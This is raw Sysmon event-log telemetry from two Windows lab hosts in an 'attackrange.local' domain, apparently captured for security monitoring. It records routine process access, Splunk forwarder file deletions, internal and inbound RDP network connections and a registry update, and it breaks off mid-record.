09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049597Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+c72a|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049596Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.556{5EBD8912-7F30-614D-0D00-00000000FC01}888908C:\Windows\system32\svchost.exe{5EBD8912-79C0-6151-E577-00000000FC01}4296C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+c604|c:\windows\system32\rpcss.dll+dade|c:\windows\system32\rpcss.dll+a6fb|c:\windows\system32\rpcss.dll+43a41|c:\windows\system32\rpcss.dll+43b72|c:\windows\system32\rpcss.dll+43eaf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001049595Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.240{5EBD8912-7F2D-614D-0B00-00000000FC01}6244660C:\Windows\system32\lsass.exe{5EBD8912-7F11-614D-0100-00000000FC01}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96ef2|C:\Windows\system32\kerberos.DLL+793e4|C:\Windows\system32\kerberos.DLL+1443f|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+2b3d4|C:\Windows\system32\lsasrv.dll+30929|C:\Windows\system32\lsasrv.dll+2e287|C:\Windows\system32\lsasrv.dll+2d211|C:\Windows\system32\lsasrv.dll+15ded|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x80000000000000001049594Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:58.218{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBEB85859505A7EAE68140E4E71B1909,SHA256=701DD790A290F2B35D8EE066FA3F5A4AEF80698742A62B5F505C9F12D8710B3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049642Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:59.717{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=653F0A07835B4B9D8B95C7DF8D1310D8,SHA256=58415A7F0566D8B62AB85F8F4238D7DC49536C3D67529AA4114B929EC327AEAD,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049641Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:57.935{5EBD8912-7F11-614D-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53326-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local445microsoft-ds 354300x80000000000000001049640Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:57.935{5EBD8912-7F11-614D-0100-00000000FC01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53326-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local445microsoft-ds 354300x80000000000000001049639Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:57.931{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53325-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49666- 354300x80000000000000001049638Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:57.931{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53325-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49666- 354300x80000000000000001049637Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:57.930{5EBD8912-7F30-614D-0D00-00000000FC01}888C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53324-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 354300x80000000000000001049636Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:57.930{5EBD8912-7F30-614D-1400-00000000FC01}1104C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53324-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 354300x80000000000000001049635Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:57.825{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-429.attackrange.local53323-false10.0.1.14win-dc-429.attackrange.local389ldap 23542300x8000000000000000978238Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:59.121{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\respondent-20210924073259-4305MD5=C03F5A35DCD33CC76F546E3EA7D3F3DF,SHA256=27CB325E5A2A8D6C4E4022C2FAED9138BDF4BFE7B38BDA6EB79267B7EDAE26D3,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049634Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:57.825{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53323-false10.0.1.14win-dc-429.attackrange.local389ldap 354300x80000000000000001049633Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:57.814{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53322-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49666- 354300x80000000000000001049632Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:57.814{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53322-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local49666- 354300x80000000000000001049631Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:57.813{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53321-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001049630Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:57.813{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53321-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local389ldap 354300x80000000000000001049629Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:57.812{5EBD8912-7F30-614D-0D00-00000000FC01}888C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53320-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 354300x80000000000000001049628Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:08:57.812{5EBD8912-7F2D-614D-0B00-00000000FC01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local53320-truefe80:0:0:0:65e5:9cae:dd2b:361bwin-dc-429.attackrange.local135epmap 23542300x80000000000000001049643Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:00.417{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85057C0964DA90D5800D6753DCDDC4AF,SHA256=16A5590AFD8969F8EC42151E177B8DE70B9412258369FD9A045389C09A3C91F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978240Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:00.133{69CF5F33-7F28-614D-1C00-00000000FD01}1852NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0a7b4daf9c254f4db\channels\health\surveyor-20210924073257-4306MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978239Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:00.007{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8AF0D0DE43D001A3768D5AA1F78F8D9D,SHA256=A9541A8E726EECB70C8650BA168DCA6BCCA0A1A4FB377F8A005C942E845A48D0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049644Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:01.438{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83305523282F50D3D179D7D254167BEA,SHA256=5CBD00E1BC3448B1D897193B6A6B364760F9BA0B694C3C4AFCC2F9B888859065,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978246Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:58.655{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59351-false10.0.1.12-8000- 354300x8000000000000000978245Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:08:58.580{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-58691-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 13241300x8000000000000000978244Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-SetValue2021-09-27 09:09:01.430{69CF5F33-7F28-614D-1100-00000000FD01}960C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d7b37f-0x4ff3a21c) 23542300x8000000000000000978243Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:01.273{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=85BDB855E27CA87EC35F14D5C198E906,SHA256=558A93158835F7B819C62A5D664D7BD2745BFF6B3E38E7137CB6B9983D53D348,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978242Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:01.273{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=55398ABA8D7473F45FC93F1162A78466,SHA256=DC56231DF4B3FD11EFBC1A8C63053186EA37C78AF4403C47B05A674C53CBF6BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978241Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:01.242{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA736CEFF8FFCE7D78AF094B3754501E,SHA256=67170698AD01C5AA2944746C4CAFBE06F6888038C732951317A4D95307B69081,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049647Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:00.529{5EBD8912-7F30-614D-0F00-00000000FC01}288C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse13.235.255.213ec2-13-235-255-213.ap-south-1.compute.amazonaws.com55019-false10.0.1.14win-dc-429.attackrange.local3389ms-wbt-server 23542300x80000000000000001049646Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:02.454{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DA19EF7ABFD30CD6BAA96C84E6C9EFFF,SHA256=C397F2E8C51D52E7D389F42051F7C70E33C2D04DE617CCC21FB0A5B515E576A9,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978248Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:00.225{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-60187-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978247Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:02.274{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D627C96E860D34599844345435996FF4,SHA256=92B15A215360F30BE4468851A47E71B329331715F8B44ECB549DB8DB3BC32B44,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049645Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:02.301{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=29384D1FA67C9A20CA8A2F7CBC84A2B5,SHA256=CB876AA3762C254FFB7A384A8C87BBA176FD2A43D652CC9DDACD12EE7F195798,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049648Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:03.500{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=12FE007FDE1373924660A564F19AF13F,SHA256=BD9389CA91B7C475EDDD73A69433DA8A30D9B89E2011E213D15F2EE66076EABA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978250Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:03.507{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CCF64C739823D0273A7DDABB0367A27,SHA256=F24948440CC8E773F7ACF705F2B34E659BB8529AA6A2D19F7D64A63BEE7E0E53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978249Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:03.226{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=85BDB855E27CA87EC35F14D5C198E906,SHA256=558A93158835F7B819C62A5D664D7BD2745BFF6B3E38E7137CB6B9983D53D348,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978251Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:04.726{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F5888221BDDEFBDDABD49DFA7796D37,SHA256=555DE77C2204FA4A194CBFC613FE0EAA579694EA4A929E9E51A8E004414C928D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049649Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:04.534{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F367718CBDA53C9180E65C2A83CFE762,SHA256=322654C3AE5F42248F15FE7A5A70717D94FCA0F7551540538A05B08200BFC4D0,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000978253Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:03.035{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse212.102.34.245unn-212-102-34-245.datapacket.com46315-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000978252Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:05.882{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F5170BCA649DB1B93C95D5CC1393221,SHA256=3702C30B348E2109E352A7FFA5177FBE4D94A044E5B080F1FA215A4344F1D899,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001049652Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:05.931{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001049651Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:05.568{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7159E6C5A575931ABF651714B046E6E6,SHA256=52BCA0982A6A6424204E206365433E70F84B512F4A3DC02C3430357BE1F87014,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001049650Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:02.845{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local53327-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001049653Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:06.599{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88A75AC3AD626D3EEDF28653DEE66C15,SHA256=F0D605C051365E9199751A563A00EBE0475CF51EC3C405BE79B21F77F454B1B6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978255Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:06.898{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FAF03A95734C6626235F309C1E904CB,SHA256=DA72AB82190B067F322BF70149ABD0961ED15F0A1D06A157EE318D9CC8F9D561,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978254Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:06.336{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F102951968B8F08C317D6D2A036F7B96,SHA256=B9574883CA8FCCFF9089B1CC01721B66B4D61A7E60FCCB1BEA807F0BF583F3C6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978257Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:07.914{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=671D92A8682203E50E483F8D627F3EA0,SHA256=AFCF342DED23F3ED71A6EAE533ADEA165A031D05F4F798701A633D128D6304CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049654Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:07.600{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2624168B40AE420D590A631371E8822D,SHA256=C3B58326BD4236031DCD5DB24793A4487058153834C346861229DE2E2B882C51,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978256Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:07.351{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=75C39176DD5C28043EF68161CBE32DC1,SHA256=B77900C7854468279EE8BB075CA7F1D36E9E0A70C2613E45B22066C7D69E60F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000978260Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:09:08.929{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08406286BF69A4C1523931CFFEB7B8A8,SHA256=EAFBA9FDFEA4CFB27B048DCA0BE6FFF26EDCD4AF4FA31193B2F568F7B3E62531,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001049657Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:09:08.721{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 